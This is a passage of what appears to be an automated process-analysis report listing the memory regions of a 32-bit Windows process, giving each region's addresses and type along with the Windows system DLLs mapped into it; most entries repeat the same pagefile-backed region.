"c:\\windows\\syswow64\\kernel32.dll") Region: id = 2276 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 2277 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 2278 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2279 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2282 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2283 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2284 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2285 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2286 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2287 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2288 start_va = 0x6f0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 2289 start_va = 0x76160000 end_va = 0x762bbfff entry_point = 0x76160000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2290 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2291 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2292 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2293 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2294 start_va = 0x20000 end_va = 0x3dfff entry_point = 0x20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2295 start_va = 0x430000 end_va = 0x5b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 2296 start_va = 0x20000 end_va = 0x3dfff entry_point = 0x20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2297 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2298 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2299 start_va = 0x6f0000 end_va = 0x870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2300 start_va = 0x8d0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 2301 start_va = 0x8e0000 end_va = 0x1cdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Region: id = 2302 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2303 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2304 start_va = 0x74e90000 end_va = 0x74e9cfff entry_point = 0x74e90000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 2305 start_va = 0x76770000 end_va = 0x773b9fff entry_point = 0x76770000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2306 start_va = 0x75660000 end_va = 0x756b6fff entry_point = 0x75660000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2307 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 2308 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2309 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2310 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 2311 start_va = 0x1ce0000 end_va = 0x20effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ce0000" filename = "" Region: id = 2312 start_va = 0x20f0000 end_va = 0x24fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020f0000" filename = "" Region: id = 2313 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2314 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2315 start_va = 0x1ce0000 end_va = 0x1faefff entry_point = 0x1ce0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2316 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2317 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2318 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2319 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2320 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2321 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2322 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2323 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2324 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2325 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2326 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2327 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2328 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2329 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2330 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2331 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2332 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2333 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2334 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2335 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2336 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2337 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2338 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2339 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2340 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2341 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2342 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2343 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2344 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2345 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2346 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2347 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2348 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2349 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2350 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2351 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2352 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2353 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2354 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2355 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2356 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2357 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2358 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2359 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2360 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2361 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2362 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2363 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2364 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2365 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2366 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2367 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2368 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2369 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2370 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2371 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2372 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2373 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2374 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2375 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2376 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2377 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 2378 start_va = 0x1fb0000 end_va = 0x23bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fb0000" filename = "" Region: id = 2379 start_va = 0x23c0000 end_va = 0x27cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023c0000" filename = "" Region: id = 2380 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2381 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2382 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2383 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2384 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2385 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2386 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2387 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2388 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2389 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2390 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2391 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2392 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2393 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2394 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2395 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2396 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2397 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2398 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2399 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2400 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2401 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2402 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2403 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2404 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2405 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2406 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2407 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2408 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2409 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2410 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2411 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2412 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2413 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2414 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2415 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2416 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2417 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2418 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2419 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2420 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2421 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2422 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2423 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2424 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2425 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2426 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2427 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2428 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2429 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2430 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2431 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2432 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2433 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2434 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2435 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2436 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2437 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2438 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2439 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2440 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2441 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2442 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2443 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 2444 start_va = 0x1fb0000 end_va = 0x23bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fb0000" filename = "" Region: id = 2445 start_va = 0x23c0000 end_va = 0x27cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023c0000" filename = "" Region: id = 2446 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2447 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2448 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2449 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2450 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2451 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2452 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2453 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2454 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2455 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2456 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2457 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2458 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2459 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2460 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2461 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2462 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2463 start_va = 0x5c0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = 